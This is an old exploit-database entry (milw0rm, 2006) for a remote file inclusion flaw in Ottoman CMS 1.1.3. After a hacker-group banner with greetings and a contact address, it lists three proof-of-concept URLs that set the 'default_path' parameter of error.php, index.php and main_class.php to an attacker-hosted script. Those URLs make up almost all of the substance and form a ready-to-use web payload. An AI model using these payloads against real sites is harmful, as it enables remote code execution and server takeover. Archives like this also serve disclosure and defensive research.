Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)

EDB-ID:

1854


Author:

Kacper

Type:

webapps


Platform:

PHP

Date:

2006-05-31


################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ottoman_v1_1_2 - Remote File Include Vulnerabilities
# Script site: http://prdownloads.sourceforge.net/ottoman/
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################

http://www.site.com/[Ottomanpath]/error.php?default_path=[evil_scripts]
http://www.site.com/[Ottomanpath]/index.php?default_path=[evil_scripts]
http://www.site.com/[Ottomanpath]/classes/main_class.php?default_path=[evil_scripts]


#Elo ;-)

# milw0rm.com [2006-05-31]